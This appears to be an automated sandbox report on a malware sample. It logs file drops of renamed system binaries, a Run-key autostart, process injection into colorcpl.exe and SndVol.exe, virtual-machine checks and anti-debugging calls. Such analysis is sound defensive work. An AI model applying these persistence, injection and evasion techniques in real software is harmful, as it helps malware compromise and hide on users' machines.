Source: Binary string: easinvoker.pdb source: nft438A5fN.exe, nft438A5fN.exe, 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1655641681.000000003960E000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1613117060.0000000002346000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1655641681.00000000395DE000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1477595760.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1655641681.0000000039626000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: cmd.pdbUGP source: esentutl.exe, 00000005.00000003.1585864121.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, alpha.pif, 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000000A.00000002.1599731448.0000000000041000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000000F.00000002.1715376572.0000000000041000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 00000018.00000000.1733704656.0000000000041000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000001B.00000002.1750139322.0000000000041000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000001C.00000000.1755754278.0000000000041000.00000020.00000001.01000000.00000006.sdmp, alpha.pif.5.dr
Source: Binary string: ping.pdbGCTL source: esentutl.exe, 00000006.00000003.1589575934.0000000005850000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, 00000010.00000002.1712179050.00000000000F1000.00000020.00000001.01000000.00000009.sdmp, xpha.pif.6.dr
Source: Binary string: easinvoker.pdbH source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: easinvoker.pdbGCTL source: nft438A5fN.exe, 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1592952655.000000003A53F000.00000004.00000020.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1655641681.000000003960E000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1613117060.0000000002346000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1592952655.000000003A510000.00000004.00000020.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1655641681.00000000395DE000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1477595760.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1655641681.0000000039626000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: cmd.pdb source: alpha.pif, alpha.pif, 0000000F.00000002.1715376572.0000000000041000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 00000018.00000000.1733704656.0000000000041000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000001B.00000002.1750139322.0000000000041000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000001C.00000000.1755754278.0000000000041000.00000020.00000001.01000000.00000006.sdmp, alpha.pif.5.dr
Source: Binary string: ping.pdb source: esentutl.exe, 00000006.00000003.1589575934.0000000005850000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, xpha.pif, 00000010.00000002.1712179050.00000000000F1000.00000020.00000001.01000000.00000009.sdmp, xpha.pif.6.dr

Data Obfuscation

Source: Yara match File source: 0.2.nft438A5fN.exe.23465a8.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.nft438A5fN.exe.2c90000.3.unpack, type: UNPACKEDPE
Source: alpha.pif.5.dr Static PE information: 0xF8D87E17 [Thu Apr 20 00:53:43 2102 UTC]
Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02CA894C LoadLibraryW,GetProcAddress,FreeLibrary, 0_2_02CA894C
Source: alpha.pif.5.dr Static PE information: section name: .didat
Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02C963AE push 02C9640Bh; ret 0_2_02C96403
Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02C963B0 push 02C9640Bh; ret 0_2_02C96403
Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02C9C349 push 8B02C9C1h; ret 0_2_02C9C34E
Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02CBC378 push 02CBC56Eh; ret 0_2_02CBC566
Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02C96782 push 02C967C6h; ret 0_2_02C967BE
Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02C96784 push 02C967C6h; ret 0_2_02C967BE
Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02D6E716 push ecx; ret 0_2_02D6E729
Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02D4C446 push ecx; ret 0_2_02D4C459
Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02C9C56C push ecx; mov dword ptr [esp], edx 0_2_02C9C571
Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02CBC570 push 02CBC56Eh; ret 0_2_02CBC566
Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02CA8AD8 push 02CA8B10h; ret 0_2_02CA8B08
Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02CAAADF push 02CAAB18h; ret 0_2_02CAAB10
Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02CAAAE0 push 02CAAB18h; ret 0_2_02CAAB10
Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02D04A50 push eax; ret 0_2_02D04B20
Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02C9CBEC push 02C9CD72h; ret 0_2_02C9CD6A
Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02C9CBE3 push 02C9CD72h; ret 0_2_02C9CD6A
Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02CA886C push 02CA88AEh; ret 0_2_02CA88A6
Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02CA6948 push 02CA69F3h; ret 0_2_02CA69EB
Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02CA6946 push 02CA69F3h; ret 0_2_02CA69EB
Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02CA2F60 push 02CA2FD6h; ret 0_2_02CA2FCE
Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02CBD2FC push 02CBD367h; ret 0_2_02CBD35F
Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02C9332C push eax; ret 0_2_02C93368
Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02CBD0AC push 02CBD125h; ret 0_2_02CBD11D
Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02CA306B push 02CA30B9h; ret 0_2_02CA30B1
Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02CA306C push 02CA30B9h; ret 0_2_02CA30B1
Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02D6F038 push eax; ret 0_2_02D6F056
Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02CBD1F8 push 02CBD288h; ret 0_2_02CBD280
Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02CBD144 push 02CBD1ECh; ret 0_2_02CBD1E4
Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02CAF108 push ecx; mov dword ptr [esp], edx 0_2_02CAF10D
Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02C9D5A0 push 02C9D5CCh; ret 0_2_02C9D5C4
Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02CA790C push 02CA7989h; ret 0_2_02CA7981

Persistence and Installation Behavior

Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\alpha.pif
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\xpha.pif
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\Libraries\Wuqtggvo.PIF
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_03206EEB ShellExecuteW,URLDownloadToFileW, 11_2_03206EEB

Boot Survival

Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\alpha.pif
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\xpha.pif
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_0321AB9E OpenSCManagerW,OpenServiceW,CloseServiceHandle,ControlService,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle, 11_2_0321AB9E
Source: C:\Users\user\Desktop\nft438A5fN.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Wuqtggvo
Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02CAAB1C GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_02CAAB1C
Source: C:\Users\user\Desktop\nft438A5fN.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_0320F7E2 Sleep,ExitProcess, 11_2_0320F7E2
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 21_2_02E8F7E2 Sleep,ExitProcess, 21_2_02E8F7E2
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle, 11_2_0321A7D9
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle, 21_2_02E9A7D9
Source: C:\Users\Public\alpha.pif API coverage: 6.3 %
Source: C:\Windows\SysWOW64\colorcpl.exe API coverage: 4.9 %
Source: C:\Users\Public\alpha.pif API coverage: 7.7 %
Source: C:\Windows\SysWOW64\colorcpl.exe API coverage: 4.9 %
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\Public\xpha.pif Last function: Thread delayed
Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02C95908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA, 0_2_02C95908
Source: C:\Users\Public\alpha.pif Code function: 7_2_00050207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove, 7_2_00050207
Source: C:\Users\Public\alpha.pif Code function: 7_2_0005589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose, 7_2_0005589A
Source: C:\Users\Public\alpha.pif Code function: 7_2_00063E66 FindFirstFileW,FindNextFileW,FindClose, 7_2_00063E66
Source: C:\Users\Public\alpha.pif Code function: 7_2_00054EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW, 7_2_00054EC1
Source: C:\Users\Public\alpha.pif Code function: 7_2_0004532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose, 7_2_0004532E
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_0321C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose, 11_2_0321C322
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_0320C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose, 11_2_0320C388
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_0320928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose, 11_2_0320928E
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_032096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose, 11_2_032096A0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_0320BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 11_2_0320BB6B
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_03219B86 FindFirstFileW,FindNextFileW,FindNextFileW, 11_2_03219B86
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_03207877 FindFirstFileW,FindNextFileW, 11_2_03207877
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_03208847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose, 11_2_03208847
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_0324E8F9 FindFirstFileExA, 11_2_0324E8F9
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_0320BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, 11_2_0320BD72
Source: C:\Users\Public\alpha.pif Code function: 15_2_0005589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose, 15_2_0005589A
Source: C:\Users\Public\alpha.pif Code function: 15_2_00050207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove, 15_2_00050207
Source: C:\Users\Public\alpha.pif Code function: 15_2_00063E66 FindFirstFileW,FindNextFileW,FindClose, 15_2_00063E66
Source: C:\Users\Public\alpha.pif Code function: 15_2_00054EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW, 15_2_00054EC1
Source: C:\Users\Public\alpha.pif Code function: 15_2_0004532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose, 15_2_0004532E
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 21_2_02E8928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose, 21_2_02E8928E
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 21_2_02E8C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose, 21_2_02E8C388
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 21_2_02E9C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose, 21_2_02E9C322
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 21_2_02E896A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose, 21_2_02E896A0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 21_2_02E99B86 FindFirstFileW,FindNextFileW,FindNextFileW, 21_2_02E99B86
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 21_2_02E8BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 21_2_02E8BB6B
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 21_2_02ECE8F9 FindFirstFileExA, 21_2_02ECE8F9
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 21_2_02E87877 FindFirstFileW,FindNextFileW, 21_2_02E87877
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 21_2_02E88847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose, 21_2_02E88847
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 21_2_02E8BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, 21_2_02E8BD72
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_03207CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW, 11_2_03207CD2
Source: Amcache.hve.14.dr Binary or memory string: VMware
Source: Amcache.hve.14.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.14.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.14.dr Binary or memory string: VMware-42 27 c5 9a 47 85 d6 84-53 49 ec ec 87 a6 6d 67
Source: Amcache.hve.14.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.14.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.14.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.14.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.14.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: nft438A5fN.exe, 00000000.00000002.1611613314.000000000085B000.00000004.00000020.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1611613314.000000000080E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Amcache.hve.14.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.14.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.14.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.14.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: xpha.pif, 00000010.00000002.1713024647.0000000002590000.00000004.00000020.00020000.00000000.sdmp, Wuqtggvo.PIF, 00000013.00000002.1713335088.000000000070E000.00000004.00000020.00020000.00000000.sdmp, Wuqtggvo.PIF, 0000001F.00000002.1804537208.0000000000618000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.14.dr Binary or memory string: vmci.sys
Source: Amcache.hve.14.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.14.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.14.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.14.dr Binary or memory string: VMware20,1
Source: Amcache.hve.14.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.14.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.14.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.14.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.14.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.14.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.14.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.14.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.14.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.14.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.14.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\nft438A5fN.exe API call chain: ExitProcess graph end node

Anti Debugging

Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02CAF744 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent, 0_2_02CAF744
Source: C:\Users\user\Desktop\nft438A5fN.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\colorcpl.exe Process queried: DebugPort
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF Process queried: DebugPort
Source: C:\Windows\SysWOW64\SndVol.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\SndVol.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_0320F3FE LdrInitializeThunk, 11_2_0320F3FE
Source: C:\Users\Public\alpha.pif Code function: 7_2_00062E37 IsDebuggerPresent, 7_2_00062E37
Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02CA894C LoadLibraryW,GetProcAddress,FreeLibrary, 0_2_02CA894C
Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02D5A8E5 mov eax, dword ptr fs:[00000030h] 0_2_02D5A8E5
Source: C:\Users\Public\alpha.pif Code function: 7_2_0006C1FA mov eax, dword ptr fs:[00000030h] 7_2_0006C1FA
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_03243355 mov eax, dword ptr fs:[00000030h] 11_2_03243355
Source: C:\Users\Public\alpha.pif Code function: 15_2_0006C1FA mov eax, dword ptr fs:[00000030h] 15_2_0006C1FA
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 21_2_02EC3355 mov eax, dword ptr fs:[00000030h] 21_2_02EC3355
Source: C:\Users\Public\alpha.pif Code function: 7_2_0004A9D4 GetEnvironmentStringsW,GetProcessHeap,RtlAllocateHeap,memcpy,FreeEnvironmentStringsW, 7_2_0004A9D4
Source: C:\Users\Public\alpha.pif Code function: 7_2_00056EC0 SetUnhandledExceptionFilter, 7_2_00056EC0
Source: C:\Users\Public\alpha.pif Code function: 7_2_00056B40 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 7_2_00056B40
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_0323503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 11_2_0323503C
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_0323BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 11_2_0323BB71
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_03234BD8 SetUnhandledExceptionFilter, 11_2_03234BD8
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_03234A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 11_2_03234A8A
Source: C:\Users\Public\alpha.pif Code function: 15_2_00056EC0 SetUnhandledExceptionFilter, 15_2_00056EC0
Source: C:\Users\Public\alpha.pif Code function: 15_2_00056B40 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 15_2_00056B40
Source: C:\Users\Public\xpha.pif Code function: 16_2_000F3600 SetUnhandledExceptionFilter, 16_2_000F3600
Source: C:\Users\Public\xpha.pif Code function: 16_2_000F3470 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 16_2_000F3470
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 21_2_02EB503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 21_2_02EB503C
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 21_2_02EB4A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 21_2_02EB4A8A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 21_2_02EB4BD8 SetUnhandledExceptionFilter, 21_2_02EB4BD8
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 21_2_02EBBB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 21_2_02EBBB71

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\nft438A5fN.exe Process created / APC Queued / Resumed: C:\Windows\SysWOW64\colorcpl.exe Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF Process created / APC Queued / Resumed: C:\Windows\SysWOW64\colorcpl.exe Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF Process created / APC Queued / Resumed: C:\Windows\SysWOW64\SndVol.exe
Source: C:\Users\user\Desktop\nft438A5fN.exe Memory allocated: C:\Windows\SysWOW64\colorcpl.exe base: 3200000 protect: page execute and read and write Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF Memory allocated: C:\Windows\SysWOW64\colorcpl.exe base: 2E80000 protect: page execute and read and write Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF Memory allocated: C:\Windows\SysWOW64\SndVol.exe base: 3290000 protect: page execute and read and write
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\alpha.pif Jump to dropped file
Source: C:\Users\user\Desktop\nft438A5fN.exe Thread APC queued: target process: C:\Windows\SysWOW64\colorcpl.exe Jump to behavior
